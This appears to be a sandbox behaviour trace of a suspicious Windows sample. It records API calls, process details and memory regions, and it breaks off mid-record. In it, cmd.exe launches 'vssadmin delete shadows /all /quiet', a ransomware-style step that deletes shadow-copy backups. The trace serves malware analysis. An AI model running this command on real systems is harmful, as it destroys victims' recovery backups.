[0150.009] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x18) returned 0x6e76a0 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0150.009] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0150.010] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0150.010] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0150.010] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0150.010] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0150.010] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0150.010] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0150.010] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0150.010] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0150.010] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0150.010] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0150.010] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0150.010] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0150.010] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0150.010] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0150.010] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0150.010] GetProcessHeap () returned 0x6e0000 [0150.010] RtlFreeHeap (HeapHandle=0x6e0000, Flags=0x0, BaseAddress=0x6e76a0) returned 1 [0150.010] GetProcessHeap () returned 0x6e0000 [0150.010] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xa) returned 0x6eb110 [0150.010] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0150.013] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f650*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin delete shadows /all /quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f69c | out: lpCommandLine="vssadmin delete shadows /all /quiet ", lpProcessInformation=0x19f69c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x10dc, dwThreadId=0x10d8)) returned 1 [0150.345] CloseHandle (hObject=0xa4) returned 1 [0150.345] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0150.345] GetProcessHeap () returned 0x6e0000 [0150.345] RtlFreeHeap (HeapHandle=0x6e0000, Flags=0x0, BaseAddress=0x6e9de8) returned 1 [0150.345] GetEnvironmentStringsW () returned 0x6e9de8* [0150.345] GetProcessHeap () returned 0x6e0000 [0150.345] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xa76) returned 0x6e7d58 [0150.345] FreeEnvironmentStringsA (penv="=") returned 1 [0150.345] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0153.756] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x19f634 | out: lpExitCode=0x19f634*=0x2) returned 1 [0153.756] CloseHandle (hObject=0xa8) returned 1 [0153.757] _vsnwprintf (in: _Buffer=0x19f71c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f63c | out: _Buffer="00000002") returned 8 [0153.757] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0153.757] GetProcessHeap () returned 0x6e0000 [0153.758] RtlFreeHeap (HeapHandle=0x6e0000, Flags=0x0, BaseAddress=0x6e7d58) returned 1 [0153.758] GetEnvironmentStringsW () returned 0x6e7d58* [0153.758] GetProcessHeap () returned 0x6e0000 [0153.758] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xa9c) returned 0x6ec790 [0153.758] FreeEnvironmentStringsA (penv="=") returned 1 [0153.758] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0153.758] GetProcessHeap () returned 0x6e0000 [0153.758] RtlFreeHeap (HeapHandle=0x6e0000, Flags=0x0, BaseAddress=0x6ec790) returned 1 [0153.758] GetEnvironmentStringsW () returned 0x6e7d58* [0153.758] GetProcessHeap () returned 0x6e0000 [0153.758] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xa9c) returned 0x6ec790 [0153.758] FreeEnvironmentStringsA (penv="=") returned 1 [0153.759] GetProcessHeap () returned 0x6e0000 [0153.759] RtlFreeHeap (HeapHandle=0x6e0000, Flags=0x0, BaseAddress=0x6eb110) returned 1 [0153.759] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f6c8 | out: lpAttributeList=0x19f6c8) [0153.759] _get_osfhandle (_FileHandle=1) returned 0x3c [0153.759] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0153.761] _get_osfhandle (_FileHandle=1) returned 0x3c [0153.761] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0153.764] _get_osfhandle (_FileHandle=0) returned 0x38 [0153.764] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0153.766] SetConsoleInputExeNameW () returned 0x1 [0153.766] GetConsoleOutputCP () returned 0x1b5 [0153.767] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0153.767] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.770] exit (_Code=2) Thread: id = 32 os_tid = 0x10f0 Process: id = "9" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x6e1b8000" os_pid = "0x1394" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x139c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 814 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 815 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 816 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 817 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 818 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 819 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 820 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 821 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 822 start_va = 0x7ff7625c0000 end_va = 0x7ff7625d0fff monitored = 0 entry_point = 0x7ff7625c16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 823 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 824 start_va = 0x780000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 825 start_va = 0x7ffd4d670000 end_va = 0x7ffd4d857fff monitored = 0 entry_point = 0x7ffd4d69ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 826 start_va = 0x7ffd4e1c0000 end_va = 0x7ffd4e26cfff monitored = 0 entry_point = 0x7ffd4e1d81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 827 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 828 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 829 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 830 start_va = 0x7ffd4df00000 end_va = 0x7ffd4df9cfff monitored = 0 entry_point = 0x7ffd4df078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 831 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 832 start_va = 0x190000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 833 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 834 start_va = 0x7ffd45030000 end_va = 0x7ffd45088fff monitored = 0 entry_point = 0x7ffd4503fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 835 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 836 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 837 start_va = 0x7ffd4dc70000 end_va = 0x7ffd4deecfff monitored = 0 entry_point = 0x7ffd4dd44970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 838 start_va = 0x7ffd4da60000 end_va = 0x7ffd4db7bfff monitored = 0 entry_point = 0x7ffd4daa02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 839 start_va = 0x7ffd4d860000 end_va = 0x7ffd4d8c9fff monitored = 0 entry_point = 0x7ffd4d896d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 840 start_va = 0x7ffd4e9d0000 end_va = 0x7ffd4eb25fff monitored = 0 entry_point = 0x7ffd4e9da8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 841 start_va = 0x7ffd4d8d0000 end_va = 0x7ffd4da55fff monitored = 0 entry_point = 0x7ffd4d91ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 842 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 843 start_va = 0x7ffd50380000 end_va = 0x7ffd504c2fff monitored = 0 entry_point = 0x7ffd503a8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 844 start_va = 0x7ffd4e160000 end_va = 0x7ffd4e1bafff monitored = 0 entry_point = 0x7ffd4e1738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 845 start_va = 0x7ffd4e2e0000 end_va = 0x7ffd4e31afff monitored = 0 entry_point = 0x7ffd4e2e12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 846 start_va = 0x7ffd4db80000 end_va = 0x7ffd4dc40fff monitored = 0 entry_point = 0x7ffd4dba0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 847 start_va = 0x7ffd4b010000 end_va = 0x7ffd4b195fff monitored = 0 entry_point = 0x7ffd4b05d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 848 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 849 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 850 start_va = 0x880000 end_va = 0xa07fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 851 start_va = 0xa10000 end_va = 0xb90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 852 start_va = 0xba0000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 853 start_va = 0x600000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 854 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 855 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 856 start_va = 0x7ffd4eb30000 end_va = 0x7ffd5008efff monitored = 0 entry_point = 0x7ffd4ec911f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 857 start_va = 0x7ffd4cb80000 end_va = 0x7ffd4cbc2fff monitored = 0 entry_point = 0x7ffd4cb94b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 858 start_va = 0x7ffd4cce0000 end_va = 0x7ffd4d323fff monitored = 0 entry_point = 0x7ffd4cea64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 859 start_va = 0x7ffd4e480000 end_va = 0x7ffd4e526fff monitored = 0 entry_point = 0x7ffd4e4958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 860 start_va = 0x7ffd500f0000 end_va = 0x7ffd50141fff monitored = 0 entry_point = 0x7ffd500ff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 861 start_va = 0x7ffd4cb70000 end_va = 0x7ffd4cb7efff monitored = 0 entry_point = 0x7ffd4cb73210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 862 start_va = 0x7ffd4d5b0000 end_va = 0x7ffd4d664fff monitored = 0 entry_point = 0x7ffd4d5f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 863 start_va = 0x7ffd4cb10000 end_va = 0x7ffd4cb5afff monitored = 0 entry_point = 0x7ffd4cb135f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 864 start_va = 0x7ffd4caf0000 end_va = 0x7ffd4cb03fff monitored = 0 entry_point = 0x7ffd4caf52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 865 start_va = 0x7ffd4b470000 end_va = 0x7ffd4b505fff monitored = 0 entry_point = 0x7ffd4b495570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 866 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 867 start_va = 0x1fa0000 end_va = 0x22d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 868 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 869 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 870 start_va = 0x80000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 871 start_va = 0x640000 end_va = 0x660fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 872 start_va = 0x6a0000 end_va = 0x6f9fff monitored = 1 entry_point = 0x6b53f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 873 start_va = 0x22e0000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 874 start_va = 0x2500000 end_va = 0x2710fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 875 start_va = 0x2720000 end_va = 0x2836fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 876 start_va = 0x2840000 end_va = 0x2a51fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 877 start_va = 0x2a60000 end_va = 0x2b76fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a60000" filename = "" Region: id = 878 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 879 start_va = 0x7ffd4e320000 end_va = 0x7ffd4e479fff monitored = 0 entry_point = 0x7ffd4e3638e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 880 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 881 start_va = 0x6a0000 end_va = 0x75bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 882 start_va = 0x70000 end_va = 0x73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 883 start_va = 0x7ffd4a370000 end_va = 0x7ffd4a391fff monitored = 0 entry_point = 0x7ffd4a371a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 884 start_va = 0x7ffd4b200000 end_va = 0x7ffd4b212fff monitored = 0 entry_point = 0x7ffd4b202760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 885 start_va = 0x7ffd4c900000 end_va = 0x7ffd4c955fff monitored = 0 entry_point = 0x7ffd4c910bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 886 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 887 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 888 start_va = 0x680000 end_va = 0x680fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 889 start_va = 0x760000 end_va = 0x764fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 890 start_va = 0x770000 end_va = 0x770fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 891 start_va = 0x2b80000 end_va = 0x2b81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b80000" filename = "" Region: id = 892 start_va = 0x7ffd43ba0000 end_va = 0x7ffd43e13fff monitored = 0 entry_point = 0x7ffd43c10400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 893 start_va = 0x2b90000 end_va = 0x2b90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 894 start_va = 0x2ba0000 end_va = 0x2ba1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ba0000" filename = "" Thread: id = 28 os_tid = 0x4c8 Thread: id = 29 os_tid = 0x13dc Thread: id = 30 os_tid = 0x137c Thread: id = 31 os_tid = 0x5ec Process: id = "10" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x6dd11000" os_pid = "0x10dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x139c" cmd_line = "vssadmin delete shadows /all /quiet " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 903 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 904 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 905 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 906 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 907 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 908 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 909 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 910 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 911 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 912 start_va = 0x8e0000 end_va = 0x8fdfff monitored = 0 entry_point = 0x8f5810 region_type = mapped_file name = "vssadmin.exe" filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe") Region: id = 913 start_va = 0x900000 end_va = 0x48fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 914 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 915 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 